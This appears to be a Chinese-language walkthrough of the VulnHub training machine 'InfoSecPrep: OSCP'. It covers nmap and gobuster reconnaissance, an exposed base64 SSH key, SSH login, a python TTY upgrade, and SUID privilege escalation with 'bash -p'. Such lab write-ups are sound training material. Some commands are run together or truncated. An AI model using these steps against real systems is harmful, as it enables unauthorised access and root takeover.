VulnHub靶機 | Infosecprep:oscp
VSole2022-08-11 11:22:05
"滿地都是六便士,他卻抬頭看見了月亮"
項目地址:
https://download.vulnhub.com/infosecprep/oscp.zip
本靶機比較適合新手
0x00.主機探測
sudo nmap -sP 192.168.33.1/24

確定目標IP為:192.168.33.131
0x01.端口服務探測:
sudo nmap -sC -sV 192.168.33.131 -oN oscp.nmap

0x02.訪問80端口:
一個很經典的WordPress頁面當然最重要的信息是only user for the box is “oscp” 這里有兩種可能:1.指wordpress后臺賬戶只有oscp,2.是這臺靶機系統上只有ROOT和OSCP這兩個用戶

是一個 WordPress 的 cms , #看下是什么版本的cmseek -u http://192.168.33.131

0x03.目錄遍歷:
sudo gobuster dir -u http://192.168.33.131 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium


http://192.168.33.131/secret.tx


Base64解密:發現是SSH密鑰

0x04.直接SSH鏈接:
ssh -i id_rsa oscp@192.168.33.131

0x05.提權:先拿一個完整的shell
python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm ctrl + z stty -a stty raw -echo;fg reset stty rows x columns y
這個靶機不能使用這個,提權要用到現在通過 python 拿一個完整的 shell 就不行了.
guid =s 提權
find / -perm -u=s -type f 2>/dev/null


/usr/bin/bash -p whoami
0x06.提權成功:

VSole
網絡安全專家